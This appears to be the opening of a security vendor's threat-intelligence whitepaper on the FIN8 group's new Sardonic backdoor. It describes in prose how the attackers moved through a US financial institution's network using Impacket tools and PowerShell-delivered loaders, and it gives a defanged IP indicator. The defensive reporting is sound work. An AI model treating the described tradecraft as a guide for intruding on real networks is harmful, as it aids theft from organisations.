FIN8 Threat Actor Goes Agile with New Sardonic Backdoor

Since January 2016, FIN8 has been steadily building a reputation among financially motivated advanced threat actors. Bitdefender researchers are constantly monitoring this group’s activity, and previous research released in early 2021 documented the use of a new, improved version of the BADHATCH backdoor.

This whitepaper focuses on the analysis of a new backdoor component discovered during a forensic investigation, described here.

As this backdoor has not been documented or referenced before, we named it “Sardonic”, given that artifacts led us to believe the threat actors use this name for an entire project including the backdoor itself, the loader and some additional scripts. We believe this project is still under development, and additional updates will likely follow.

Key facts about Sardonic:

Attack Flow

The attack described in this whitepaper was uncovered after a FIN8 infection at a financial institution in the US. While we couldn’t identify how the attackers gained initial access to the network, FIN8 is known for using social engineering and spear-phishing tactics to infiltrate target organizations.

As described in our previous threat intelligence report on FIN8, once in the network, the attackers began with network reconnaissance, obtaining information about the domain (users, domain controllers) and continued with lateral movement and privilege escalation. In addition to the use of WMIExec, which we reported earlier, we found traces of SMBExec from the same toolset (Impacket), along with, of course, the offensive features of their signature backdoor, BADHATCH.

The BADHATCH loader was deployed using PowerShell scripts downloaded from the 104.168.237[.]21 IP address using the legitimate sslip.io service. It was used during the reconnaissance, lateral movement, privilege escalation and possibly impact stages.

There were multiple attempts to deploy the Sardonic backdoor on domain controllers in order to continue with privilege escalation and lateral movement, but the malicious command lines were blocked. We saw no traces of BADHATCH on these high-value targets. However, we identified one SQL server where some artifacts indicate that the threat actors intended to deploy both backdoors.